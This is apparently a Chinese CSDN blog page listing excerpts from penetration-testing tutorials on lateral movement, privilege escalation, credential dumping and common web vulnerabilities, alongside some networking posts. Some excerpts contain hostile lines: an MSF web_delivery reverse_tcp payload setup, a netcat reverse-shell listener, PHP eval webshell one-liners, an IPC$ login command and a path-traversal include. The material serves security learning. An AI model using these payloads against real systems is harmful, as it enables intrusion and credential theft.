自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(79)
  • 收藏
  • 关注

原创 MSF横向之MSF端口转发+路由表+SOCKS5+proxychains

MSF后渗透的一些操作端口转发添加路由,横向渗透(跨网段攻击)利用arp扫描内网主机Socks代理篇新版的msf和老版的不一样,代理模块也不一样。auxiliary/server/socks_proxy配置proxychains用代理软件去连接建立好的socks隧道,便可以成功访问内网。proxychains+nmap扫描主机是否存在漏洞proxychains使用msf框架...

2022-07-01 14:42:30 2366 1

原创 提权扫描工具

1,Windows-Exploit-Suggester使用Windows-Exploit-Suggester解析systeminfohttps://github.com/AonCyberLabs/Windows-Exploit-Suggester由于最新版的xlrd对xls的处理方式不同了,导致这个脚本有使用会报错,所以我们使用老版本的xlrd,记得是如下命令pip2.7 install xlrd==1.2.02,使用Linux-Exploit-Suggester.sh寻找linux提权问题下载

2022-06-23 21:29:12 654 1

原创 bypassuac提权

UAC介绍UAC是微软为提高系统安全性中引入的技术。UAC要求用户在执行可能影响计算机运行的操作或者在进行可能影响其他用户的设置之前,拥有相应的权限或者管理员密码。UAC在操作启动前对用户身份进行验证,以避免恶意软件和间谍软件在未经许可的情况下在计算机上进行安装操作或者对计算机设置进行修改。微软设置的安全控制策略,分为高、中、低三个等级。高等级的进程有管理员权限;中等级的进程有普通管理员权限;低等级的进程,权限是有限的,以保证系统在受到安全威胁时造成的损害最小。uac绕过为了远程执行目标的ex

2022-06-20 21:00:25 1244

原创 内网渗透令牌窃取

令牌令牌是描述进程或者线程安全上下文的一个对象。不同的用户登录计算机后, 都会生成一个Access Token,这个Token在用户创建进程或者线程时会被使用,不断的拷贝,这也就解释了A用户创建一个进程而该进程没有B用户的权限。一般用户双击运行一个进程都会拷贝explorer.exe的Access Toke访问令牌分为:授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌面等)模拟令牌(Impersonation token):非交互式登陆(例:net use 访

2022-06-17 20:44:33 252

原创 内网渗透Windows密码凭证获取

记录一下抓取window凭证信息的一些工具Windows凭证抓取1,procdump (官方工具无视免杀)(首选)procdump + mimikatz 加载dmp文件,并导出其中的明文密码(procdump过杀软)2,注册表读取windows hash (首选)当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。注册表读取密码主要获取的是3个文件3,Pwdump4,mimikatz(名声最大的密码获取工具)5,MSFMSF框架密

2022-06-09 20:35:54 2558

原创 横向渗透之哈希传递(PTH)

哈希传递PTHPTH,即Pass The Hash,通过找到与账号相关的密码散列值(通常是NTLM Hash)来进行攻击。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。kb2871997,禁止了本地管理员进行远程连接,从而组织了管理员权限执行wmi,psexec等危险命令,但是这个补丁不知道为什么漏了一个默认(user SID=500)本

2022-05-08 21:54:33 1892

原创 横向渗透之IPC横向

IPC横向IPC(Internet Process Connection)共享命名管道的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,使用139、445端口。利用条件1,目标主机开启了139和445端口2,目标主机管理员开启了ipc$默认共享:3,知道目标机的账号密码建立IPC连接建立IPC连接命令:net use \\172.16.1.132\ipc$ "password" /user:"Administrator" #工作组net us

2022-04-16 19:16:07 859

原创 横向渗透之PsExec工具使用

psexec(微软官方工具)可以躲避检测无视杀毒软件,直接system权限PsExec是一个轻量级的telnet替代品,它允许您在其他系统上执行进程,并为控制台应用程序提供完整的交互性,而无需手动安装客户端软件。PsExec的基本原理是:通过管道在远程目标机器上创建一个psexec服务,并在本地磁盘中生成一个名为PSEXESVC的二进制文件,然后通过psexec服务运行命令,运行结束后删除任务。利用条件445端口开放,知道目标账号密码PsExec下载地址优点:可以躲避检测无视杀毒软件

2022-04-16 16:59:03 3545

原创 上线MSF(Metasploit)的几种常见方式

powershell上线利用powershell上线msf对应模块use exploit/multi/script/web_deliveryuse exploit/multi/script/web_deliveryset target 2 set payload windows/x64/meterpreter/reverse_tcpset lhost 172.16.1.10set lport 6666run复制对应的powershell代码到Windows主机中执行便可以上线msfm

2022-04-14 21:51:51 8766

原创 rad+xray漏洞扫描工具

rad全名 Radiumrad也为长亭科技开发的一款目录爬取工具,所以结合rad可以更高效的自动爬取。注意rad只是爬取目标的目录,不爬取子域。下载地址https://github.com/chaitin/rad基本使用要提前安装好谷歌浏览器,才能使用该工具。rad -t http://example.com需要手动登录的情况rad -t http://example.com -wait-login执行以上命令会自动禁用无头浏览模式,开启一个浏览器供手动登录。 在登录完毕后在命令行界

2022-02-13 16:54:18 8190 2

原创 尝试用Python写漏洞验证脚本

小白尝试写任意文件读取poc我是一个小白,完全不懂Python,但是Python在渗透中往往是一个重要的角色。有一个CSDN百万大佬写了这样一句话,不会编程的渗透都是耍流氓。我虽然菜但是也想尝试学习写一下Python漏洞的poc和exp。我是在网上找到的学习方法,随便记录一下。尝试写一个批量验证漏洞的poc发现小米路由器有一个任意文件读取漏洞,学着写了看看小米路由器远程任意文件读取漏洞小米路由器远程任意文件读取漏洞(CVE-2019-18371)小米路由器的Nginx的配置文件错误,导致目录

2022-02-05 16:36:56 4245

原创 shell的正向和反向

正向shell和反向shell正向shell:控制端主动发起连接去连接被控制端反向shell:被控制端主动连接控制端在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,比如说硬件设备有防火墙,入侵防御系统等,还有网站防火墙,端口占用,权限不足等场景,特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇,后期攻击相当繁琐。反向shell:而被控制端主动向外发送的数据包通常都不会被拦截。反向shell如下Linux常见反向shellbash反弹shellnc -lvp

2022-02-05 13:59:16 8093

原创 Windows提权

Windows权限分为四种user: 普通用户权限administrator::管理员权限system 系统权限TrustedInstaller:Windows中最高权限。有些文件,连System权限也无法修改。通过getshell拿到权限之后,权限比较低什么事情的干不了,我们就要提权到administrator或者更高的system权限。前期可以上传扫描脚本判断出内核漏洞或者系统漏洞,直接利用漏洞提权是最好的方法。常见的提权信息收集脚本:vulmap, Wes,WindowsVulnSc

2022-01-10 19:43:21 2770

原创 Linux提权篇

Linux提权Linux提权一般把提权脚本放置在/tmp目录下,临时文化,可读写执行。有本地用户就本地提权,没有就msf提权。Linux提权自动化脚本利用工具信息收集工具:LinEnum, linuxprivchecker漏洞收集工具:linux-exploit-suggester linux-exploit-suggester2提权方式如下1,Linux SUID提权suid可以让调用者以文件拥有者的身份运行该文件,所以我们就利用suid提权的思路就是运行root用户所拥有的suid文件

2022-01-07 17:39:06 14805 1

原创 web XXE漏洞

XXE漏洞XML External Enti ty lnjectionxml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载。导致可能加载恶意外部文件,造成文件读取,命令执行,内网端口扫描,dos攻击等。XXE的防御禁用外部实体的方法过滤用户提交的xml数据,如关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。...

2021-12-24 17:21:44 1991

原创 web SQL注入漏洞

SQL注入漏洞SQL注入漏洞是OWASP十大漏洞之一,常年霸榜前3.它不是利用操作系统来实现攻击。而是针对开发编写时的疏漏,通过SQL语句,实现无账号登录,篡改数据,盗取账号密码,盗取企业数据,脱库等。SQL注入的分类联合注入 UNION query SQL injection错误注入 Error-based SQL injection布尔注入 Boolean-based blind SQL injection世界延迟注入 Time-based blind SQL injection多

2021-12-24 15:21:58 2741

原创 web SSRF漏洞

SSRF 漏洞SSRF(Server-Side Request Forgery,服务器端请求伪造),是一种由攻击者构造请求然后服务器端发起的请求安全漏洞,SSRF攻击的目标是从外网无法访问内部系统,正因为是服务器端发起的,所以能够请求到与它相连的内网。SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。注释:除了http/https等方式可以造成ssrf,类似tcp connect

2021-12-22 21:52:25 1377

原创 web CSRF漏洞

CSRF漏洞客服端跨站请求伪造(Cross-site request forgery,CSRF), CSRF是客服端向服务端请求的一种攻击。攻击者通过伪造一个链接,将链接发送给目标用户欺骗用户点击。该链接实际上是获取某个网站信任用户信息的链接,目的是用户电脑登录该网站,一旦用户点击该链接,实际攻击就完成了,常与XSS结合攻击。攻击原理攻击者盗用了你的身份信息,以你的名义发送恶意请求,对服务器来说这个请求是你发送的,想当于借刀杀人。XSS利用站点内的信任用户,盗取cookieCSRF通过伪造成

2021-12-22 16:20:56 223

原创 web XSS漏洞

XSS简介跨站脚本(cross site script)为了避免和css混淆,所以简称为XSS,XSS是出现在web中的安全漏洞,也是主流漏洞之一,XSS是指恶意攻击者利用网站没有对用户提交的数据进行转义处理或者过滤不足的缺点,添加代码嵌入到web页面中,使用户访问会执行相应的嵌入代码攻击危害盗取各种用户账号盗取用户cookie资料,冒充用户身份进入网站劫持用户会话,执行任意操作刷流量,执行弹窗广告转播蠕虫病毒控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力构造XSS脚本弹框

2021-12-21 23:12:17 1290

原创 web逻辑漏洞

越权漏洞浏览器对用户的提交数据请求没有经过严格的权限设置,导致用户可以拥有观察或更改其他用户信息的功能,通过ID之类的身份之类的身份标识,从而使a账号获取b账号的数据等,或者使用低权限用户身份的账号,发送高权限账号才可以有的请求。获取的高权限的操作通过删除请求中的认证信息后重放该请求,依旧可以访问或者完成操作越权分为两种水平越权:用户在权限想同等级下的组,可以进行越权访问,修改,删除数据相同的普通用户可以看到其他普通用户里面的数据。垂直越权:用户在不同权限下的组,可以进行高级别的权限使用。比

2021-12-20 11:26:43 514

原创 web命令及代码执行漏洞

云想衣裳花想容

2021-12-15 14:36:20 1822

原创 web任意文件下载和目录遍历

文件下载漏洞文件下载功能在很多web系统上的会出现,一般当我们点击下载链接,便会向后台发送一个下载请求,一般这个请求会包含一个需要下载的文件名称,后台在收到请求后会开始执行下载代码。将该文件名对应的response给浏览器,从而完成下载,如果后台收到请求下载的文件名后下载文件的路径而不对其他进行安全验证,将其直接拼接下载文件的路径而中不对其进行安全判断的话,则可能引发不按预期的文件下载漏洞,比如下载到/etc/passwd目录下的文件,或者下载到MySQL配置文件等漏洞挖掘可以通过扫描工具探测

2021-12-14 14:04:51 841

原创 web文件包含漏洞

文件包含开发人员会把重复使用的函数写到单个文件中,在使用函数某些特定的时候直接调用此文件称之为文件包含文件包含漏洞的分类本地文件包含(服务器上的本地文件)远程文件包含(包含其他网站上的文件,比如一句话木马)本地文件包含无限制http://127.0.0.0.1:8080/include.php?filename=1.txthttp://127.0.0.0.1:8080/include.php?filename=../../../shell.php有限制%00截断绕过,PHP版本<

2021-12-13 23:16:06 1032

原创 web文件上传漏洞

文件上传漏洞文件上传本身不是漏洞,但是没有过滤能上传一句话木马就造成了漏洞,一句话木马:一句话木马简洁,功能强大,在上传中有很大入侵作用。常见的一句话php木马<?php @eval($_REQUEST['cmd']);?><?php @eval($_GET['cmd']);?><?php @eval($_POST['cmd']);?>当然还有其他的木马jsp等图片马图片马是一句话木马加上图片构造的木马在路径下准备好一句话木马.php和一张图片 .

2021-12-13 18:11:04 862

原创 MySQL基本语法

MySQL基本命令MySQL 登录命令mysql -uroot -proot或者root@owaspbwa:~# mysql -uroot -pEnter password:创建数据库mysql> create database aaa;显示所有数据库mysql> show databases;查看所在数据库mysql> select database();删除数据库mysql> drop database aaa;进入数据库mysql> use ya

2021-10-01 22:29:46 101

原创 WireShark 抓包及常用协议分析

wireshark抓包过滤器使用例如:协议过滤比较简单,直接在Filter框中直接输入协议名即可。注意:协议名称需要输入小写。 tcp,只显示TCP协议的数据包列表 http,只查看HTTP协议的数据包列表 icmp,只显示ICMP协议的数据包列表 arp 显示arp协议数据包 ssh 显示ssh数据协议 ospf 显示ospf数据协议 ip过滤 ip.src ==192.168.1.104 显示源地址 ip.dst=

2021-09-25 22:01:16 1575

原创 渗透测试之信息收集

利用第三方服务对目标进行被动信息收集被动信息:指发布在互联网上的信息信息收集-DNS1,域名解析root@xuegod53:~# ping xuegod.cnPING xuegod.cn (101.200.128.35) 56(84) bytes of data.64 bytes from 101.200.128.35 (101.200.128.35): icmp_seq=1 ttl=52 time=8.51 ms2,使用nslookup查看域名root@xuegod53:~# nsloo

2021-09-21 16:18:00 622

原创 kali linux 下载安装比较好用的命令

下载文件wget,当然还可以通过浏览器下载wget http://repo.mysql.com/mysql-community-release-el7-5.noarch.rpm安装.deb的包dpkg -i Nessus-8.13.1-ubuntu910_amd64.deb 开始安装dpkg -P Nessus-8.13.1-ubuntu910_amd64.deb 卸载软件包安装.sh的包./acunetix_13.0.200217097_x64_.sh 开始安

2020-12-24 22:21:10 2653

原创 华为交换机路由器安全加固

我想我是一朵死去的花,不然怎么就盛开不了呢 ---------涩现在的网络架构更注重也安全,无论从设备还是软件方面的能体现出来。只有安全的网络才能保证传输的可靠性,稳定性,安全性,以及隐私性。华为设备加固1,远程管理服务对于使用远程维护,telnet协议采用的是不加密传输,容易导致密码不泄露,设备应采用ssh加密协议,提高网络设备管理安全性。配置步骤1,生成密钥。[Huawei]rsa local-key

2020-12-02 13:09:48 4621

原创 ms11_003(漏洞复现)

你我的一样,终将被遗忘 《郭源潮》漏洞简介,ms11-003(windows7IE溢出攻击) 是利用IE8中对css的解析存在一个问题,导致任何访问包含非法css的页面将导致IE8崩溃重启的漏洞。当然ie浏览器还要很多漏洞像ms14_068,但它们利用方式的差不多。在nessud漏洞扫描工具中ms11_003漏洞排分可是10分,最高的一个等级,像ms17_010和cve_2019_0796这些漏洞的没有10分,想必是该漏洞没有什么能阻挡的吧攻击步骤攻击机—

2020-11-20 15:22:46 2462 2

原创 ensp(ospf虚链路配置实验)

虚链路----------跨越非骨干区域实现与骨干区域0互连如图(实现全网互通)配置R4配置[Huawei]interface g0/0/0[Huawei-GigabitEthernet0/0/0]ip address 192.168.14.1 24[Huawei]ospf 1 router-id 1.1.1.1 [Huawei-ospf-1]area 0[Huawei-ospf-1-area-0.0.0.0]network 192.168.14.0 0.0.0.255R1配置

2020-11-06 10:09:25 4001

原创 ensp(华为ospf特殊区域配置)

OSPF的七种类型LSA:1类LSA ,路由器LSA (router LSA)由区域内所有路由器产生,并且只能在本个区域内泛红广播。这些最基本的LAS通告例出了路由器的所有接口,并指明了他们的状态和沿每条链路方向出站的代价。2类LSA,网络LSA (Network LSA)由区域的DR和BDR路由器产生,报文包括DR和BDR连接的路由器的链路信息,网络LSA也仅仅在产生这条网络的区域内部进行泛洪。3类LSA, 网络汇总LSA (Network summary LSA)由ABR产生,可以通知本区域

2020-11-04 15:19:23 2917

原创 ensp(华为ospf基本配置)

ospf简介OSPF(Open Shortest Path First开放式最短路径优先)是一个内部网关协议(Interior Gateway Protocol,简称IGP),用于在单一自治系统(autonomous system,AS)内决策路由。是对链路状态路由协议的一种实现,隶属内部网关协议(IGP),故运作于自治系统内部。著名的迪克斯彻(Dijkstra)算法被用来计算最短路径树。OSPF支持负载均衡和基于服务类型的选路,也支持多种路由形式,如特定主机路由和子网路由等。工作原理OSPF的简单说

2020-11-03 11:30:16 6274 2

原创 ensp(华为VRRP配置)

VRRP的作用VRRP一般指虚拟路由器冗余协议。虚拟路由冗余协议(Virtual Router Redundancy Protocol,简称VRRP)是由IETF提出的解决局域网中配置静态网关出现单点失效现象的路由协议,1998年已推出正式的RFC2338协议标准。VRRP广泛应用在边缘网络中,它的设计目标是支持特定情况下IP数据流量失败转移不会引起混乱,允许主机使用单路由器,以及即使在实际第一跳路由器使用失败的情形下仍能够维护路由器间的连通性。就是两个网关,一个主网关,一个备份网关,主网关down了,

2020-11-02 16:28:18 2540

原创 IP地址子网划分公式,简单便捷公式。

当我们对一个网络进行子网划分时,基本上就是将它分成小的网络。比如,当一组IP地址指定给一个公司时,公司可能将该网络“分割成”小的网络,每个部门一个。这样,技术部门和管理部门都可以有属于它们的小网络。通过划分子网,我们可以按照我们的需要将网络分割成小网络。这样也有助于降低流量和隐藏网络的复杂性。优点1.减少网络流量2.提高网络性能3.简化管理4.易于扩大地理范围子网划分公式 可用主机位 子网掩码二进制表达

2020-10-14 15:53:35 3587

原创 CVE-2018-8120漏洞复现(提权)

最好用的提权漏洞CVE-2018-8120漏洞描述部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码影响版本Windows 7 for 32-bit Systems Service Pack 1Windows 7 for x64-based Systems Service Pack 1Windows Server 2008 for 32-bit System

2020-10-14 09:54:53 1813

原创 CVE-2020-0796漏洞复现(蓝屏警告)

CVE-2020-0796简介微软3月11日发布3月例行更新,其中并未公布编号为CVE-2020-0796的高危漏洞资料,但该漏洞却最为引人注目。次日晚(2020年3月12日)微软正式发布CVE-2020-0796高危漏洞补丁。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。除了直接攻击SMB服务端造成RCE外,该漏洞得亮点在于对SMB客户端的攻击,击者可以构造特定的网页,压缩包,

2020-09-20 11:53:55 1993

原创 CVE-2019-0708漏洞复现(蓝屏警告)

漏洞介绍:该漏洞是2019年危害最大的严重性漏洞,(无视防火墙),该漏洞是通过Windows,3389远程端口进行攻击的,被攻击的主机会造成蓝屏,也有可能会反弹shell,但是我试过好几次的没有反弹shell,而是直接造成蓝屏。漏洞影响版本:Windows 7 for 32Windows 7 for x64Windows Server 2008 for 32Windows Server 2008 for x64Windows Server 2003 SP2 x86Windows Serv

2020-09-18 15:43:46 2549

原创 华为和思科mac地址和IP地址绑定

为什么mac地址和IP地址要绑定?提高局域网安全,防止arp攻击和欺骗计算机都提供了修改IP地址的方法,所以用户可以随意更改自己的IP地址,IP地址的随意修改势必影响其他用户的正常上网,所以推行IP地址和MAC地址绑定,每一个分配的IP地址都要绑定到用户自己的注册的MAC地址上,保证了用户的合法IP不被盗用和滥用,有效地保证了网络的安全和通信质量。绑定的方式有很多种,可以在电脑上绑定,也可以在交换机上绑定思科交换机绑定配置INTERNAL-CORE-1> enable

2020-09-10 11:58:29 668

原创 ensp (华为acl配置)

访问控制列表(ACL)访问控制列表(ACL)是一种基于包过滤的访问控制技术。它可以根据设定的条件对接口上的数据包进行过滤,允许其通过或丢弃。访问控制列表被广泛地应用于路由器和三层交换机。借助于访问控制列表可以有效地控制用户对网络的访问,从而最大程度地保障网络安全。acl作用1,限制网络流量、提高网络性能。例如,ACL可以根据数据包的协议,指定这种类型的数据包具有更高的优先级,同等情况下可预先被网络设备处理。2,提供对通信流量的控制手段。 [3,提供网络访问的基本安全手段。4,在网络设备接口

2020-09-08 20:07:43 7352

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除